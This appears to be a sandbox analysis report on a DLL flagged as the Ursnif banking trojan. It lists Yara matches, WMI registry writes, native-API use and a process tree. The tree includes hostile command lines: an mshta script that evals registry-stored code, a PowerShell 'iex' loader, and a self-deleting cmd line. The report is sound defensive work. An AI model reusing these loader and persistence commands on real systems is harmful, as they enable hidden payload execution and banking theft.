Source: Yara match File source: 6.3.rundll32.exe.2f18cd6.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.rundll32.exe.31b0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.loaddll32.exe.f30000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.3.rundll32.exe.4ad8cd6.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.3.rundll32.exe.2e38cd6.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.loaddll32.exe.30994a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.3.rundll32.exe.4da94a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.rundll32.exe.32e0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.loaddll32.exe.11c8cd6.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.loaddll32.exe.30994a0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.3.rundll32.exe.32d8cd6.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.3.rundll32.exe.4da94a0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000003.00000003.380707508.00000000032D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.405323039.0000000002F10000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.408114811.00000000011C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.441574566.0000000004DA9000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000003.392684354.0000000004AD0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.379823360.0000000002E30000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1031847284.0000000003099000.00000004.00000040.sdmp, type: MEMORY

E-Banking Fraud:

barindex
Yara detected Ursnif
Source: Yara match File source: 00000000.00000003.440873523.0000000003A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000003.521119646.0000019E72A0C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.502401968.0000000004AA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.502219800.0000000004AA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.471379540.0000000005A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.462394382.0000000005A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.462596690.0000000005A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.440860771.0000000003A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.462470408.0000000005A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000002.1014883407.0000019E72A0C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000003.521272154.0000019E72A0C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.502330882.0000000004AA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.440884295.0000000003A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.462528723.0000000005A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.502570590.0000000004AA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.448279110.0000000003A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.524731514.00000000064C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.502479250.0000000004AA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.466413805.0000000005A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.440805888.0000000003A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.443913452.0000000003A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000003.521180114.0000019E72A0C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000003.521239146.0000019E72A0C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.502279805.0000000004AA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.440780908.0000000003A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.502609356.0000000004AA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.440846323.0000000003A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.440750956.0000000003A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.473802684.000000000585C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.462613151.0000000005A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.440828072.0000000003A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.502443301.0000000004AA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.450243555.000000000385C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.462579053.0000000005A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.502514325.0000000004AA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.462505929.0000000005A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.462554968.0000000005A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: loaddll32.exe PID: 7044, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 7076, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: control.exe PID: 2988, type: MEMORYSTR
Source: Yara match File source: 3.3.rundll32.exe.595a4a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.3.rundll32.exe.595a4a0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.3.rundll32.exe.5a08d40.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.3.rundll32.exe.59d94a0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.loaddll32.exe.39d94a0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.loaddll32.exe.3a08d40.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.loaddll32.exe.3a08d40.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.loaddll32.exe.395a4a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.loaddll32.exe.395a4a0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000003.00000003.471332372.00000000059D9000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.471296215.000000000595A000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000000.516409229.00000000009F0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.448235433.00000000039D9000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000000.518371045.00000000009F0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000000.638276522.0000000000CC0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.448202934.000000000395A000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000002.975772859.0000000000CC1000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000002.1014253469.00000000009F1000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000000.760211370.0000000000CC0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1031952216.00000000036DF000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000000.564342319.0000000000CC0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000000.514046155.00000000009F0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 6.3.rundll32.exe.2f18cd6.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.rundll32.exe.31b0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.loaddll32.exe.f30000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.3.rundll32.exe.4ad8cd6.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.3.rundll32.exe.2e38cd6.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.loaddll32.exe.30994a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.3.rundll32.exe.4da94a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.rundll32.exe.32e0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.loaddll32.exe.11c8cd6.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.loaddll32.exe.30994a0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.3.rundll32.exe.32d8cd6.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.3.rundll32.exe.4da94a0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000003.00000003.380707508.00000000032D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.405323039.0000000002F10000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.408114811.00000000011C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.441574566.0000000004DA9000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000003.392684354.0000000004AD0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.379823360.0000000002E30000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1031847284.0000000003099000.00000004.00000040.sdmp, type: MEMORY
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00F33FAB CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError, 0_2_00F33FAB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_032E3FAB CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError, 3_2_032E3FAB

System Summary:

barindex
Writes or reads registry keys via WMI
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::CreateKey
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Writes registry values via WMI
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Uses 32bit PE files
Source: 2u2mgtylJy.dll Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
Detected potential crypto function
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00F32654 0_2_00F32654
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00F37E30 0_2_00F37E30
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00F34FA7 0_2_00F34FA7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_032E4FA7 3_2_032E4FA7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_032E7E30 3_2_032E7E30
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_032E2654 3_2_032E2654
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_031B4FA7 6_2_031B4FA7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_031B7E30 6_2_031B7E30
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_031B2654 6_2_031B2654
Source: C:\Windows\System32\control.exe Code function: 31_2_00A0F2F0 31_2_00A0F2F0
Source: C:\Windows\System32\control.exe Code function: 31_2_00A0B530 31_2_00A0B530
Source: C:\Windows\System32\control.exe Code function: 31_2_00A040B4 31_2_00A040B4
Source: C:\Windows\System32\control.exe Code function: 31_2_00A1508C 31_2_00A1508C
Source: C:\Windows\System32\control.exe Code function: 31_2_00A1E0CF 31_2_00A1E0CF
Source: C:\Windows\System32\control.exe Code function: 31_2_00A07834 31_2_00A07834
Source: C:\Windows\System32\control.exe Code function: 31_2_009FE008 31_2_009FE008
Source: C:\Windows\System32\control.exe Code function: 31_2_009F3804 31_2_009F3804
Source: C:\Windows\System32\control.exe Code function: 31_2_00A03074 31_2_00A03074
Source: C:\Windows\System32\control.exe Code function: 31_2_00A1C874 31_2_00A1C874
Source: C:\Windows\System32\control.exe Code function: 31_2_009F9074 31_2_009F9074
Source: C:\Windows\System32\control.exe Code function: 31_2_00A159A8 31_2_00A159A8
Source: C:\Windows\System32\control.exe Code function: 31_2_00A0D9AC 31_2_00A0D9AC
Source: C:\Windows\System32\control.exe Code function: 31_2_00A14988 31_2_00A14988
Source: C:\Windows\System32\control.exe Code function: 31_2_009FB1D8 31_2_009FB1D8
Source: C:\Windows\System32\control.exe Code function: 31_2_00A0C9F0 31_2_00A0C9F0
Source: C:\Windows\System32\control.exe Code function: 31_2_00A0C1D4 31_2_00A0C1D4
Source: C:\Windows\System32\control.exe Code function: 31_2_00A0D150 31_2_00A0D150
Source: C:\Windows\System32\control.exe Code function: 31_2_00A132EC 31_2_00A132EC
Source: C:\Windows\System32\control.exe Code function: 31_2_00A1D2DC 31_2_00A1D2DC
Source: C:\Windows\System32\control.exe Code function: 31_2_00A08218 31_2_00A08218
Source: C:\Windows\System32\control.exe Code function: 31_2_00A09268 31_2_00A09268
Source: C:\Windows\System32\control.exe Code function: 31_2_00A1AA6C 31_2_00A1AA6C
Source: C:\Windows\System32\control.exe Code function: 31_2_00A07278 31_2_00A07278
Source: C:\Windows\System32\control.exe Code function: 31_2_009F6A68 31_2_009F6A68
Source: C:\Windows\System32\control.exe Code function: 31_2_00A1EB10 31_2_00A1EB10
Source: C:\Windows\System32\control.exe Code function: 31_2_00A06B1C 31_2_00A06B1C
Source: C:\Windows\System32\control.exe Code function: 31_2_009F2B74 31_2_009F2B74
Source: C:\Windows\System32\control.exe Code function: 31_2_00A164F4 31_2_00A164F4
Source: C:\Windows\System32\control.exe Code function: 31_2_00A03C24 31_2_00A03C24
Source: C:\Windows\System32\control.exe Code function: 31_2_00A00474 31_2_00A00474
Source: C:\Windows\System32\control.exe Code function: 31_2_00A0ED94 31_2_00A0ED94
Source: C:\Windows\System32\control.exe Code function: 31_2_00A1DD9C 31_2_00A1DD9C
Source: C:\Windows\System32\control.exe Code function: 31_2_00A08DF4 31_2_00A08DF4
Source: C:\Windows\System32\control.exe Code function: 31_2_00A085CC 31_2_00A085CC
Source: C:\Windows\System32\control.exe Code function: 31_2_00A19524 31_2_00A19524
Source: C:\Windows\System32\control.exe Code function: 31_2_00A0FD6C 31_2_00A0FD6C
Source: C:\Windows\System32\control.exe Code function: 31_2_00A07D44 31_2_00A07D44
Source: C:\Windows\System32\control.exe Code function: 31_2_009FC6F4 31_2_009FC6F4
Source: C:\Windows\System32\control.exe Code function: 31_2_00A16E34 31_2_00A16E34
Source: C:\Windows\System32\control.exe Code function: 31_2_009F8628 31_2_009F8628
Source: C:\Windows\System32\control.exe Code function: 31_2_009F779C 31_2_009F779C
Source: C:\Windows\System32\control.exe Code function: 31_2_00A0DFB8 31_2_00A0DFB8
Source: C:\Windows\System32\control.exe Code function: 31_2_00A0179C 31_2_00A0179C
Source: C:\Windows\System32\control.exe Code function: 31_2_00A13F08 31_2_00A13F08
Source: C:\Windows\System32\control.exe Code function: 31_2_00A09770 31_2_00A09770
Contains functionality to call native functions
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00F322EC NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose, 0_2_00F322EC
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00F33C64 GetProcAddress,NtCreateSection,memset, 0_2_00F33C64
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00F337E0 NtMapViewOfSection, 0_2_00F337E0
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00F38055 NtQueryVirtualMemory, 0_2_00F38055
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_032E37E0 NtMapViewOfSection, 3_2_032E37E0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_032E3C64 GetProcAddress,NtCreateSection,memset, 3_2_032E3C64
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_032E22EC NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose, 3_2_032E22EC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_032E8055 NtQueryVirtualMemory, 3_2_032E8055
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_031B22EC NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose, 6_2_031B22EC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_031B8055 NtQueryVirtualMemory, 6_2_031B8055
Source: C:\Windows\System32\control.exe Code function: 31_2_00A0FAA8 NtSetInformationProcess,CreateRemoteThread, 31_2_00A0FAA8
Source: C:\Windows\System32\control.exe Code function: 31_2_009F1A58 NtQueryInformationToken,NtQueryInformationToken,NtClose, 31_2_009F1A58
Source: C:\Windows\System32\control.exe Code function: 31_2_009F2B08 NtQueryInformationProcess, 31_2_009F2B08
Source: C:\Windows\System32\control.exe Code function: 31_2_00A2F00B NtProtectVirtualMemory,NtProtectVirtualMemory, 31_2_00A2F00B
PE file does not import any functions
Source: jdlmh2q4.dll.18.dr Static PE information: No import functions for PE file found
Source: yg5i0oy3.dll.29.dr Static PE information: No import functions for PE file found
Source: w34iw342.dll.20.dr Static PE information: No import functions for PE file found
Source: 4z2qptpk.dll.33.dr Static PE information: No import functions for PE file found
Sample file is different than original file name gathered from version info
Source: 2u2mgtylJy.dll Binary or memory string: OriginalFilenameSoon.dll8 vs 2u2mgtylJy.dll
Searches for the Microsoft Outlook file path
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE Jump to behavior
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: 2u2mgtylJy.dll Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Windows\System32\loaddll32.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\2u2mgtylJy.dll'
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\2u2mgtylJy.dll',#1
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\2u2mgtylJy.dll,Bonebegin
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\2u2mgtylJy.dll',#1
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\2u2mgtylJy.dll,Father
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\2u2mgtylJy.dll,Ratherdesign
Source: unknown Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>K0qx='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(K0qx).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>'
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\jdlmh2q4.cmdline'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESD66D.tmp' 'c:\Users\user\AppData\Local\Temp\CSCCE0193F21C5D49109645DA91D5FFF210.TMP'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\w34iw342.cmdline'
Source: unknown Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Cbv5='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Cbv5).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESE022.tmp' 'c:\Users\user\AppData\Local\Temp\CSC919BED62534A4CC3BF2669B466E033B8.TMP'
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\yg5i0oy3.cmdline'
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES889.tmp' 'c:\Users\user\AppData\Local\Temp\CSCCED00F42533349BEA98D8A77AE340CD.TMP'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\4z2qptpk.cmdline'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES1839.tmp' 'c:\Users\user\AppData\Local\Temp\CSC5471F709FE714810AB0D5625CD34D24.TMP'
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /C ping localhost -n 5 && del 'C:\Users\user\Desktop\2u2mgtylJy.dll'
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\2u2mgtylJy.dll',#1 Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\2u2mgtylJy.dll,Bonebegin Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\2u2mgtylJy.dll,Father Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\2u2mgtylJy.dll,Ratherdesign Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\2u2mgtylJy.dll',#1 Jump to behavior
